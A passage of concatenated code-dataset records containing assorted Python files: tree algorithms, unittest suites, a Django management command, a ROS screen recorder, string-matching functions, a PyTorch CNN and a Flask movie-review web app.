False\n\n if node1.val != node2.val:\n return False\n else:\n return check(node1.left, node2.right) and check(node1.right, node2.left)\n return check(root, root)\n\n\nif __name__ == '__main__':\n root = TreeNode(1)\n root.left = TreeNode(2)\n root.right = TreeNode(2)\n root.left.left = TreeNode(3)\n root.left.right = TreeNode(4)\n root.right.left = TreeNode(4)\n root.right.right = TreeNode(3)\n print(isSymmetric(root))\n","sub_path":"101-200/101/symmetric-tree.py","file_name":"symmetric-tree.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"476195981","text":"import os, sys, os.path as op\nsys.path.insert(0, os.path.join(os.getenv('CITY_PATH'), 'src'))\nimport random\nimport logging\nimport sqlite3\nimport shutil\nimport unittest\nfrom learning.video2dataset import video2dataset, exportVideo\nfrom learning.helperImg import ProcessorRandom, ProcessorVideo\nfrom learning.helperDb import imageField, createDb\n\n\nclass TestVideo (unittest.TestCase):\n\n def setUp (self):\n self.imgProcessor = ProcessorRandom ({'dims': (240,352), 'relpath': '.'})\n\n conn = sqlite3.connect(':memory:') # in RAM\n createDb(conn)\n self.conn = conn\n\n def tearDown(self):\n if os.path.exists('testdata/video/test'): shutil.rmtree ('testdata/video/test')\n self.conn.close()\n\n\n def test_video2database_wrongTimeFormat (self):\n c = self.conn.cursor()\n\n video_path = 'testdata/video/cam119.avi'\n time_path = 'testdata/video/wrongtime.txt'\n params = {'relpath': '.'}\n with self.assertRaises(Exception): \n video2dataset (c, video_path, video_path, time_path, '', params)\n\n\n def test_video2database (self):\n c = self.conn.cursor()\n\n video_path = 'testdata/video/cam119.avi'\n time_path = 'testdata/video/cam119.txt'\n params = {'relpath': '.'}\n video2dataset (c, video_path, video_path, time_path, 'test', params)\n\n c.execute ('SELECT * FROM images')\n image_entries = c.fetchall()\n self.assertEqual (len(image_entries), 3)\n imagefile0 = imageField(image_entries[0], 'imagefile')\n imagefile2 = imageField(image_entries[2], 'imagefile')\n maskfile0 = imageField(image_entries[0], 'maskfile')\n maskfile2 = imageField(image_entries[2], 'maskfile')\n width = imageField(image_entries[0], 'width')\n height = imageField(image_entries[0], 'height')\n self.assertEqual (imagefile0, 'testdata/video/cam119/000000')\n self.assertEqual (imagefile2, 'testdata/video/cam119/000002')\n self.assertEqual (maskfile0, 'testdata/video/cam119/000000')\n self.assertEqual (maskfile2, 'testdata/video/cam119/000002')\n self.assertEqual (width, 352)\n self.assertEqual (height, 240)\n\n\nclass TestExportVideo (unittest.TestCase):\n \n def setUp (self):\n self.conn = sqlite3.connect(':memory:') # in RAM\n createDb(self.conn)\n c = self.conn.cursor()\n\n s = 'images(imagefile,width,height)'\n v = ('testdata/Cassini/images/000000.jpg',100,100)\n c.execute('INSERT INTO %s VALUES (?,?,?)' % s, v)\n v = ('testdata/Cassini/images/000001.jpg',100,100)\n c.execute('INSERT INTO %s VALUES (?,?,?)' % s, v)\n v = ('testdata/Moon/images/000000.jpg',120,80)\n c.execute('INSERT INTO %s VALUES (?,?,?)' % s, v)\n v = ('testdata/Moon/images/000001.jpg',120,80)\n c.execute('INSERT INTO %s VALUES (?,?,?)' % s, v)\n v = ('testdata/Moon/images/000002.jpg',120,80)\n c.execute('INSERT INTO %s VALUES (?,?,?)' % s, v)\n\n s = 'cars(id,imagefile,name,x1,y1,width,height,score)'\n v = (1,'testdata/Cassini/images/000000.jpg','sedan',24,42,6,6,1)\n c.execute('INSERT INTO %s VALUES (?,?,?,?,?,?,?,?)' % s, v)\n v = (2,'testdata/Cassini/images/000000.jpg','truck',44,52,20,15,0.5) # default ratio\n c.execute('INSERT INTO %s VALUES (?,?,?,?,?,?,?,?)' % s, v)\n v = (3,'testdata/Cassini/images/000001.jpg','truck',24,42,16,16,0.1)\n c.execute('INSERT INTO %s VALUES (?,?,?,?,?,?,?,?)' % s, v)\n\n def tearDown (self):\n if op.exists('testdata/Cassini/imwrite.avi'): os.remove('testdata/Cassini/imwrite.avi')\n if op.exists('testdata/Moon/imwrite.avi'): os.remove('testdata/Moon/imwrite.avi')\n\n\n def test_exportVideo (self):\n c = self.conn.cursor()\n image_processor = ProcessorVideo \\\n ({'relpath': '.', \n 'out_dataset': {'testdata/Cassini/images.avi': 'testdata/Cassini/imwrite.avi',\n 'testdata/Moon/images.avi': 'testdata/Moon/imwrite.avi'}\n })\n exportVideo (c, {'image_processor': image_processor, 'relpath': '.'})\n\n # TODO: check the videos\n\n\nif __name__ == '__main__':\n logging.basicConfig (level=logging.ERROR)\n unittest.main()","sub_path":"test/learning/test_video2dataset.py","file_name":"test_video2dataset.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"375692714","text":"#-------------------------------------------------------------------------------\n#\n# Project: EOxServer \n# Authors: Martin Paces \n# Fabian Schindler \n#\n#-------------------------------------------------------------------------------\n# Copyright (C) 2014 EOX IT Services GmbH\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell \n# copies of the Software, and to permit persons to whom the Software is \n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies of this Software or works derived from this Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#-------------------------------------------------------------------------------\n\nfrom optparse import make_option\nfrom itertools import product\n\nfrom django.core.management.base import CommandError, BaseCommand\n\nfrom eoxserver.resources.coverages import models\nfrom eoxserver.resources.coverages.management.commands import (\n CommandOutputMixIn, _variable_args_cb, nested_commit_on_success\n)\n\n\nclass Command(CommandOutputMixIn, BaseCommand):\n option_list = BaseCommand.option_list + (\n make_option(\"-c\", \"--collection\", dest=\"collection_ids\",\n action='callback', callback=_variable_args_cb,\n default=None, help=(\"Collection(s) in which the \"\n \"objects shall be inserted.\")\n ), \n make_option(\"-a\", \"--add\", dest=\"add_ids\",\n action='callback', callback=_variable_args_cb,\n default=None, help=(\"List of the to be inserted \"\n \"eo-objects.\")\n ), \n make_option('--ignore-missing-collection',\n dest='ignore_missing_collection',\n action=\"store_true\", default=False,\n help=(\"Optional. Proceed even if the linked parent \"\n \"does not exist. By defualt, a missing parent \" \n \"will terminate the command.\")\n ),\n make_option('--ignore-missing-object',\n dest='ignore_missing_object',\n action=\"store_true\", default=False,\n help=(\"Optional. Proceed even if the linked child \"\n \"does not exist. By defualt, a missing child \" \n \"will terminate the command.\")\n ),\n )\n\n args = (\n \"--collection [ ...] \"\n \"--add [--add ...] \"\n \"[--ignore-missing-collection] [--ignore-missing-object]\"\n )\n \n help = \"\"\"\n Link (insert) one or more EOObjects into one or more dataset series. \n Pre-existing links are ignored.\n \"\"\"\n\n @nested_commit_on_success\n def handle(self, *args, **kwargs):\n # check the required inputs\n collection_ids = kwargs.get('collection_ids', None)\n add_ids = kwargs.get('add_ids', None)\n if not collection_ids: \n raise CommandError(\n \"Missing the mandatory collection identifier(s)!\"\n )\n\n if not add_ids: \n raise CommandError(\n \"Missing the mandatory identifier(s) for to be inserted \"\n \"objects.\"\n )\n\n # extract the collections \n ignore_missing_collection = kwargs['ignore_missing_collection']\n collections = [] \n for collection_id in collection_ids: \n try: \n collections.append(\n models.Collection.objects.get(identifier=collection_id)\n )\n except models.Collection.DoesNotExist: \n msg = (\n \"There is no Collection matching the given \"\n \"identifier: '%s'\" % collection_id\n )\n if ignore_missing_collection: \n self.print_wrn(msg)\n else: \n raise CommandError(msg) \n\n # extract the children \n ignore_missing_object = kwargs['ignore_missing_object']\n objects = [] \n for add_id in add_ids: \n try:\n objects.append(\n models.EOObject.objects.get(identifier=add_id)\n )\n except models.EOObject.DoesNotExist:\n msg = (\n \"There is no EOObject matching the given identifier: '%s'\"\n % add_id\n )\n if ignore_missing_object:\n self.print_wrn(msg)\n else:\n raise CommandError(msg)\n \n try:\n for collection, eo_object in product(collections, objects):\n # check whether the link does not exist\n if eo_object not in collection:\n self.print_msg(\n \"Linking: %s <--- %s\" % (collection, eo_object)\n )\n collection.insert(eo_object)\n\n else:\n self.print_wrn(\n \"Collection %s already contains %s\" \n % (collection, eo_object)\n )\n\n except Exception as e:\n self.print_traceback(e, kwargs)\n raise CommandError(\"Linking failed: %s\" % (e))\n","sub_path":"eoxserver/resources/coverages/management/commands/eoxs_collection_link.py","file_name":"eoxs_collection_link.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"389866273","text":"#!/usr/bin/env python3\n\nimport os\nimport rospy\nimport rospkg\nimport cv2\nimport pyautogui\nimport numpy as np\nfrom time import sleep\nfrom time import perf_counter\n\nimport gi\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk\n\nclass Screen_Record:\n def __init__(self):\n rospy.init_node('pioneer_screen_record', anonymous=False)\n rospy.loginfo(\"[SS] Pioneer Wolf Screen Record - Running\")\n rospack = rospkg.RosPack()\n self.data_path = rospack.get_path(\"pioneer_main\") + \"/data/wolf_walk\"\n\n sleep(2)\n n_folder = len(os.walk(self.data_path).__next__()[1]) - 1\n data_path = \"{}/{}\".format(self.data_path, n_folder)\n cam_file = \"{}/wolf_screen_cam-{}.avi\" .format(data_path, n_folder)\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n\n s = Gdk.Screen.get_default()\n # screen_size = (s.get_width(), s.get_height())\n screen_size = (1920, s.get_height())\n self.out = cv2.VideoWriter(cam_file, fourcc, 30.0, screen_size)\n self.main_rate = rospy.Rate(30)\n\n def run(self):\n while not rospy.is_shutdown():\n img = pyautogui.screenshot()\n frame = np.array(img)\n # print(frame.shape)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n self.out.write(frame)\n\n # ch = 0xFF & cv2.waitKey(1)\n # if ch == 27:\n # break\n self.main_rate.sleep()\n\n self.out.release()\n\nif __name__ == '__main__':\n ss = Screen_Record()\n ss.run()","sub_path":"PIONEER-ROBOT/pioneer_vision/scripts/wolf_vision/screen_recording.py","file_name":"screen_recording.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"652074974","text":"import re\nimport sys\nimport os\nimport json\n\n'''\nMAIN FUNCTION\n'''\ndef kmp(list_of_posts, keywords):\n # Status that hold the string is spam or not\n list_of_status = {}\n\n index = 0\n for string in list_of_posts:\n # Append the result based on spam or not\n if (search_kmp(string.lower(), keywords.lower())):\n list_of_status[index] = True\n else:\n list_of_status[index] = False\n index += 1\n\n return list_of_status\n\n\ndef regular_expression(list_of_posts, keywords):\n # Status that hold the string is spam or not\n list_of_status = {}\n\n # Split the pattern to each character to insert .*\n pat_split = list(keywords.lower())\n pattern = \"\"\n\n # Generate pattern from keyword inserting .* to each char\n for i in range(len(pat_split)):\n pattern += (\".*\" + pat_split[i])\n pattern += \".*\"\n\n # Compile pattern into regex pattern\n regex = re.compile(pattern)\n \n index = 0\n for string in list_of_posts:\n # Append the result based on spam or not\n if (regex.match(string.lower())):\n list_of_status[index] = True\n else: \n list_of_status[index] = False\n index += 1\n \n return list_of_status\n\ndef boyer_moore(list_of_posts, keywords):\n # Status that hold the string is spam or not\n list_of_status = {}\n\n index = 0\n for string in list_of_posts:\n # Set string and keywords to lower case\n bm = search_occurence(string.lower(), keywords.lower())\n\n # Append the result based on spam or not\n if (bm != -1):\n list_of_status[index].append(True)\n else:\n list_of_status[index].append(False)\n index += 1\n\n return list_of_status\n\n'''\nHELPER FUNCTION\n'''\n\ndef search_kmp(text, word):\n # Create index table\n idx_table = []\n idx_table.append(0)\n j = 0\n cont = False\n \n # Searching word while appending to index table\n for i in range(1, len(word) - 1):\n if (word[i] == word[j]):\n j += 1\n cont = True\n else:\n cont = False\n if (not(cont)):\n j = 0\n idx_table.append(j)\n\n idx = 0\n found = False\n j = 0\n\n # Iterate until finding matching or at the end of text\n while (idx < len(text) and not found):\n if (text[idx] == word[j]):\n j += 1\n if (j == len(word)):\n found = True\n else:\n if (j > 0):\n j = idx_table[j-1]\n idx -= 1\n idx += 1\n \n return found\n\ndef generate_last_occurence(string, size):\n # Set all number of chars to be -1\n last = [-1] * 128\n \n # Fill the actual value of last occurence\n for i in range(size):\n last[ord(string[i])] = i\n \n \t# Return last occurence list\n return last\n \ndef search_occurence(text, pattern):\n\t# Store the pattern and text length\n pat_length = len(pattern)\n txt_length = len(text)\n \n # Create the last character list\n last = generate_last_occurence(pattern, pat_length) \n \n shifted = 0\t\n while (shifted <= txt_length - pat_length):\n \t# Last idx for backward iteration\n j = pat_length - 1\n \n \t\t# Keep reducing j while text still matched pattern\n while (j >= 0 and pattern[j] == text[shifted + j]):\n j -= 1\n \n # Get the matching between pattern and text\n if j < 0:\n return shifted\n\n else:\n # Shift depend on it's availability in list\n shifted += max(1, j - last[ord(text[shifted + j])])\n\n # Return -1 when didn't find any match\n return -1\n\nif __name__ == '__main__':\n\n with open(\"post.json\") as f:\n list_of_posts = json.loads(f.read())\n f.close()\n\n with open(\"command.txt\") as fc:\n command = fc.readline()\n fc.close()\n\n with open(\"keyword.txt\") as fk:\n keyword = fk.readline()\n fk.close()\n\n if (command == \"bm\"):\n json_out = kmp(list_of_posts, keyword)\n print(json.JSONEncoder().encode(json_out))\n elif (command == \"regex\"):\n json_out = regular_expression(list_of_posts, keyword)\n print(json.JSONEncoder().encode(json_out))\n else:\n json_out = kmp(list_of_posts, keyword)\n print(json.JSONEncoder().encode(json_out))","sub_path":"algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"359079830","text":"import unittest\nfrom collect_fractions import validate_values,collect_fractions,LCM,check_zero_denominator,check_fraction_length_bigger_than_required,check_fraction_length_lower_than_required\n\nclass TestValidateValues(unittest.TestCase):\n def test_input_if_it_is_given_as_tuple_of_tuples(self):\n exc = None\n try:\n validate_values(((1,2),(3,4)))\n except Exception as err:\n exc = err\n\n self.assertIsNotNone(exc)\n self.assertEqual(str(exc),'Passed fractions are not in the form of a list of tuples')\n\n def test_input_if_it_is_given_as_dictionary_of_tuples(self):\n exc = None\n try:\n validate_values({1:2,3:4})\n except Exception as err:\n exc = err\n\n self.assertIsNotNone(exc)\n self.assertEqual(str(exc),'Passed fractions are not in the form of a list of tuples')\n\n def test_input_if_there_are_more_than_two_fractions(self):\n exc = None\n try:\n validate_values([(1,2),(3,4),(5,6)])\n except Exception as err:\n exc = err\n\n self.assertIsNotNone(exc)\n self.assertEqual(str(exc),'More than 2 fractions are being passed for the program to collect')\n\n def test_input_if_there_is_fraction_with_more_than_two_elements(self):\n exc = None\n try:\n validate_values([(1,2),(3,4,5)])\n except Exception as err:\n exc = err\n\n self.assertIsNotNone(exc)\n self.assertEqual(str(exc),'There is a fraction with more than two elements')\n\n def test_input_if_there_is_fraction_with_less_than_two_elements(self):\n exc = None\n try:\n validate_values([(1,2),(3,)])\n except Exception as err:\n exc = err\n\n self.assertIsNotNone(exc)\n self.assertEqual(str(exc),'There is a fraction with less than two elements')\n\n\n def test_input_if_there_is_a_fraction_whose_denominator_is_zero(self):\n exc = None\n try:\n validate_values([(1,0),(2,3)])\n except Exception as err:\n exc = err\n\n self.assertIsNotNone(exc)\n self.assertEqual(str(exc),'Second element of one of the fractions is zero - cannot divide by zero!!!')\n\nclass TestLCM(unittest.TestCase):\n def test_LCM_with_zero(self):\n fract = (0,99)\n first,second = fract\n self.assertEqual(0,LCM(first,second))\n \n def test_LCM_with_negative_number(self):\n fract = (-12,28)\n first,second = fract\n self.assertEqual(-84,LCM(first,second))\n\nclass TestCollectFractions(unittest.TestCase):\n def test_collecting_of_fractions_when_no_need_of_simplifying(self):\n result = collect_fractions([(1,2),(1,3)])\n self.assertEqual(result,(5,6))\n\n def test_collecting_of_fractions_when_there_is_need_of_simplifying(self):\n result = collect_fractions([(1,2),(2,10)])\n self.assertEqual(result,(7,10))\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"Week2/test_collect_fractions.py","file_name":"test_collect_fractions.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"635104973","text":"import logging\nimport os\nfrom pony import orm\nfrom publ import model, config\n\nlogging.basicConfig(level=logging.INFO)\n\nconfig.database_config['filename'] = os.path.join(os.getcwd(), 'test.db')\n\nmodel.setup()\n\nwith orm.db_session:\n cat = model.Category.get(category='test')\n if not cat:\n print(\"creating anew\")\n cat = model.Category(\n category='test', file_path='path', sort_name='asdfadsf')\n orm.commit()\n\n print(cat.category, cat.file_path, cat.sort_name)\n\n blank = model.Category.get(category='')\n if not blank:\n print(\"making fresh\")\n blank = model.Category(category='', file_path='blah', sort_name='asdf')\n","sub_path":"tests/schemaTest.py","file_name":"schemaTest.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"228530537","text":"from .util import format_currency\nfrom ..base import PAWTBase\n\n\nclass Invoice(PAWTBase):\n def __init__(self, tg, data):\n super().__init__(tg)\n\n self.title = data[\"title\"]\n self.description = data[\"description\"]\n self.start_parameter = data[\"start_parameter\"]\n self.currency = data[\"currency\"]\n self.total_amount = data[\"total_amount\"]\n\n self._cached_cost = None\n\n def __repr__(self):\n return \"\".format(self.title)\n\n def __str__(self):\n return \"{} ({})\".format(self.title, self.format_cost())\n\n def format_cost(self):\n if not self._cached_cost:\n self._cached_cost = format_currency(\n self.currency, self.total_amount, self._tg\n )\n return self._cached_cost\n","sub_path":"pawt/models/message_specials/invoice.py","file_name":"invoice.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"468536054","text":"# -*- coding: utf-8 -*-\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass MultiLayerCNN(nn.Module):\n def __init__(self, vocab_size, embedding_dim, max_seq_len,\n label_size, embeddings=None, requires_grad=True):\n super().__init__()\n self.vocab_size = vocab_size\n self.embedding_dim = embedding_dim\n self.max_seq_len = max_seq_len\n self.requires_grad = requires_grad\n self.embeddings = embeddings\n self.label_size = label_size\n self.embed = nn.Embedding(vocab_size + 1, embedding_dim)\n\n if embeddings != None:\n self.embed.weight = nn.Parameter(\n embeddings, requires_grad=requires_grad)\n\n self.conv1 = nn.Sequential(\n nn.Conv1d(max_seq_len, 256, kernel_size=7, stride=1),\n nn.ReLU(),\n nn.MaxPool1d(kernel_size=3, stride=3)\n )\n\n self.conv2 = nn.Sequential(\n nn.Conv1d(256, 256, kernel_size=7, stride=1),\n nn.ReLU(),\n nn.MaxPool1d(kernel_size=3, stride=3)\n )\n\n self.conv3 = nn.Sequential(\n nn.Conv1d(256, 256, kernel_size=3, stride=1),\n nn.ReLU()\n )\n\n self.conv4 = nn.Sequential(\n nn.Conv1d(256, 256, kernel_size=3, stride=1),\n nn.ReLU()\n )\n\n self.conv5 = nn.Sequential(\n nn.Conv1d(256, 256, kernel_size=3, stride=1),\n nn.ReLU()\n )\n\n self.conv6 = nn.Sequential(\n nn.Conv1d(256, 256, kernel_size=3, stride=1),\n nn.ReLU(),\n nn.MaxPool1d(kernel_size=3, stride=3)\n )\n\n self.fc = nn.Linear(256*7, label_size)\n\n def forward(self, x):\n x = self.embed(x) # dim: (batch_size, max_seq_len, embedding_size)\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv5(x)\n x = self.conv6(x)\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n\n return F.log_softmax(x)\n","sub_path":"texion/models/torch/multilayercnn.py","file_name":"multilayercnn.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"55753673","text":"from app import app\nimport movies\nimport users\nimport reviews\nimport suggestions\nimport categories\nfrom flask import redirect, render_template, request\n\n@app.route(\"/\", methods = [\"GET\", \"POST\"])\ndef main():\n if request.method == \"GET\":\n\t movie_list = movies.get_movie_list()\n\t return render_template(\"main.html\", movies=movie_list)\n\n if request.method == \"POST\":\n sort=request.form.get(\"sort\")\n if sort == \"newest\":\n movie_list=movies.get_movie_list_newest()\n elif sort == \"oldest\":\n movie_list=movies.get_movie_list_oldest()\n elif sort == \"best\":\n movie_list=movies.get_movie_list_best()\n elif sort == \"worst\":\n movie_list=movies.get_movie_list_worst()\n elif sort == \"latest\":\n movie_list = movies.get_movie_list()\n else:\n movie_list = movies.get_movie_list()\n return render_template(\"main.html\", movies=movie_list)\n\n@app.route(\"/login\", methods=[\"POST\"])\ndef login():\n username = request.form[\"username\"]\n password = request.form[\"password\"]\n if users.login(username, password):\n return redirect(\"/\")\n else:\n return render_template(\"login_issue.html\")\n\n@app.route(\"/logout\")\ndef logout():\n users.logout()\n return redirect(\"/\")\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n if request.method == \"GET\":\n return render_template(\"make_account.html\")\n \n if request.method == \"POST\":\n username = request.form[\"username\"]\n password = request.form[\"password\"]\n if users.username_exists_already(username):\n return render_template (\"register_error.html\", message=\"Käyttäjätunnus on varattu.\")\n if len(username) >= 20 or len(username) <= 1:\n return render_template(\"register_error.html\", message=\"Käyttäjätunnuksen täytyy olla 1-20 merkkiä.\")\n if password == \"\":\n return render_template(\"register_error.html\", message=\"Salasana on tyhjä.\")\n \n if users.register(username,password):\n return redirect(\"/\")\n else:\n return render_template(\"register_error.html\", message=\"Uuden tunnuksen luonti epäonnistui.\")\n\n@app.route(\"/movie_page/\", methods=[\"GET\", \"POST\"])\ndef movie_page(id):\n if request.method == \"GET\":\n if not movies.get_movie_info(id):\n return render_template(\"issue.html\", message=\"Valitettavasti elokuvaa ei löytynyt.\")\n info = movies.get_movie_info(id)\n review_list = reviews.get_reviews(id)\n amount_of_reviews = reviews.get_amount(id)\n average= reviews.get_average(id)\n return render_template(\"movie_page.html\", information=info,reviews=review_list, amount_of_reviews=amount_of_reviews, average=average, id=id)\n if request.method == \"POST\":\n users.check_csrf()\n movie_id=request.form[\"movie_id\"]\n grade = int(request.form[\"grade\"])\n review = request.form[\"review\"]\n if grade == 0 or grade == 1 or grade == 2 or grade == 3 or grade == 4 or grade == 5 or grade == 6 or grade == 7 or grade == 8 or grade == 9 or grade == 10:\n if not reviews.create_review(movie_id, grade, review):\n return render_template(\"review_issue.html\", message=\"Arvostelun lisäys ei onnistunut\", id=id)\n else:\n return redirect(\"/movie_page/\"+ str(movie_id))\n return render_template(\"review_issue.html\", message=\"Arvostelussa pitää olla ainakin arvosana.\", id=id)\n \n\n@app.route(\"/my_reviews\")\ndef my_reviews():\n mine = reviews.get_my_reviews()\n number_of_reviews = reviews.get_number_of_reviews()\n return render_template(\"my_reviews.html\", mine=mine, number_of_reviews=number_of_reviews)\n\n@app.route(\"/suggest_movies\")\ndef suggest_movies():\n return render_template(\"suggest_movies.html\")\n\n@app.route(\"/new_suggestion\", methods=[\"POST\"])\ndef new_suggestion():\n users.check_csrf()\n name = request.form[\"name\"]\n if len(name) < 1 or len(name) > 177:\n return render_template(\"suggestion_error.html\", message=\"Elokuvan nimi pitää olla 1-177 merkkiä.\")\n year=request.form[\"year\"]\n if len(year) != 4:\n return render_template(\"suggestion_error.html\", message=\"Vuosiluvussa pitää olla 4 numeroa\")\n if int(year) > 2021:\n return render_template(\"suggestion_error.html\", message=\"Julkaisu vuosi ei voi olla uudempi kuin 2021\")\n genres=request.form[\"genre\"]\n if genres == \"\":\n return render_template(\"suggestion_error.html\", message=\"Elokuvalla pitää olla edes yksi genre\")\n description=request.form[\"description\"]\n if description == \"\":\n return render_template(\"suggestion_error.html\", message=\"Elokuvalla pitää olla kuvaus\")\n leading_roles=request.form[\"leading_roles\"]\n if leading_roles == \"\":\n return render_template(\"add_movie_error.html\", message=\"Elokuvalla pitää olla edes yksi päärooli\")\n\n if suggestions.make_suggestion(name, year, genres, description, leading_roles):\n return render_template(\"new_suggestion.html\")\n else:\n return render_template(\"suggestion_error.html\", message=\"Ehdotuksen lisääminen epäonnistui\")\n\n@app.route(\"/add_movie\", methods=[\"GET\",\"POST\"])\ndef add_movie():\n users.require_admin()\n if request.method == \"GET\":\n return render_template(\"add_movie.html\")\n if request.method == \"POST\":\n users.check_csrf()\n name = request.form[\"name\"]\n if len(name) < 1 or len(name) > 177:\n return render_template(\"add_movie_error.html\", message=\"Elokuvan nimi pitää olla 1-177 merkkiä.\")\n if movies.check_if_movie_exists(name):\n return render_template(\"add_movie_error.html\", message=\"Tämän niminen elokuva on jo olemassa.\")\n year = request.form[\"year\"]\n if len(year) != 4:\n return render_template(\"add_movie_error.html\", message=\"Vuosiluvussa pitää olla 4 numeroa\")\n if int(year) > 2021:\n return render_template(\"add_movie_error.html\", message=\"Julkaisu vuosi ei voi olla uudempi kuin 2021\")\n genres = request.form[\"genre\"]\n if genres == \"\":\n return render_template(\"add_movie_error.html\", message=\"Elokuvalla pitää olla edes yksi genre\")\n description = request.form[\"description\"]\n if description == \"\":\n return render_template(\"add_movie_error.html\", message=\"Elokuvalla pitää olla kuvaus\")\n leading_roles = request.form[\"leading_roles\"]\n if leading_roles == \"\":\n return render_template(\"add_movie_error.html\", message=\"Elokuvalla pitää olla edes yksi päärooli\")\n\n if movies.add_movie(name,year,genres, description, leading_roles):\n return redirect (\"/\")\n else:\n return render_template(\"add_movie_error.html\", message=\"Elokuvan lisäys epäonnistui\")\n\n@app.route(\"/suggestions\")\ndef suggestion_page():\n users.require_admin()\n suggestion_list = suggestions.get_suggestions()\n number_of_suggestions = suggestions.get_number_of_suggestions()\n return render_template(\"suggestions.html\", suggestions=suggestion_list, number_of_suggestions=number_of_suggestions)\n \n@app.route(\"/accept\", methods=[\"POST\"])\ndef accept():\n users.require_admin()\n users.check_csrf()\n id = request.form[\"id\"]\n if suggestions.suggested_movie_exists(id):\n return render_template(\"suggestions_issue.html\", message=\"Tämän niminen elokuva on jo olemassa.\")\n suggestions.accept(id)\n return redirect (\"/suggestions\")\n\n@app.route(\"/decline\", methods=[\"POST\"])\ndef decline():\n users.require_admin()\n users.check_csrf()\n id = request.form[\"id\"]\n suggestions.decline(id)\n return redirect (\"/suggestions\")\n\n@app.route(\"/delete_review\", methods=[\"POST\"])\ndef delete_review():\n users.check_csrf()\n id = int(request.form[\"review_id\"])\n movie_id = request.form[\"movie_id\"]\n reviews.delete_review(id)\n return redirect (\"/movie_page/\" + str(movie_id))\n\n@app.route(\"/delete_review_admin\", methods=[\"POST\"])\ndef delete_review_admin():\n users.require_admin()\n users.check_csrf()\n id = int(request.form[\"review_id\"])\n movie_id = request.form[\"movie_id\"]\n reviews.delete_review(id)\n return redirect (\"/movie_page/\" + str(movie_id))\n\n@app.route(\"/delete_my_review\", methods=[\"POST\"])\ndef delete_my_review():\n users.check_csrf()\n id = request.form[\"review_id\"]\n reviews.delete_review(id)\n return redirect (\"/my_reviews\")\n\n@app.route(\"/categories\")\ndef categories_page():\n category_list = categories.get_categories()\n return render_template(\"categories_page.html\", categories=category_list)\n\n\n@app.route(\"/category_page/\")\ndef category_page(id):\n if not categories.get_category_name(id):\n return render_template(\"issue.html\", message=\"Valitettavasti kategoriaa ei löydy\")\n category_name = categories.get_category_name(id)\n if not categories.get_category_contents(id):\n return render_template(\"empty_category.html\", category_name=category_name, id=id)\n movie_list = categories.get_category_contents(id)\n return render_template(\"category_page.html\", movies=movie_list, category_name=category_name, id=id)\n\n@app.route(\"/delete_category\", methods=[\"POST\"])\ndef delete_category():\n users.require_admin()\n users.check_csrf()\n category_id = request.form[\"category_id\"]\n categories.delete_category(category_id)\n return redirect (\"/categories\")\n\n@app.route(\"/movie_to_category\", methods=[\"POST\"])\ndef movie_to_category():\n users.require_admin()\n users.check_csrf()\n category_id = request.form[\"category_id\"]\n movie_name = request.form[\"movie_name\"]\n if categories.check_movie_in_category(movie_name, category_id):\n return render_template(\"category_issue.html\", message=\"Elokuva on jo tässä kategoriassa\", id=category_id)\n if not movies.check_if_movie_exists(movie_name):\n return render_template(\"category_issue.html\", message=\"Elokuvaa ei löydy\", id=category_id)\n elif categories.movie_to_category(category_id, movie_name):\n return redirect (\"/category_page/\" + str(category_id))\n else:\n return render_template(\"category_issue.html\", message=\"Elokuvan lisääminen ei onnistunut\", id=category_id)\n\n@app.route(\"/add_category\", methods=[\"POST\"])\ndef add_category():\n users.require_admin()\n users.check_csrf()\n name = request.form[\"category_name\"]\n categories.add_category(name)\n return redirect (\"/categories\")\n\n@app.route(\"/search_results\")\ndef serach_results():\n query = request.args[\"query\"]\n results = movies.search_movie(query)\n return render_template(\"search_results.html\", results=results)\n\n@app.route(\"/delete_movie\", methods=[\"POST\"])\ndef delete_movie():\n users.require_admin()\n users.check_csrf()\n movie_id = request.form[\"movie_id\"]\n 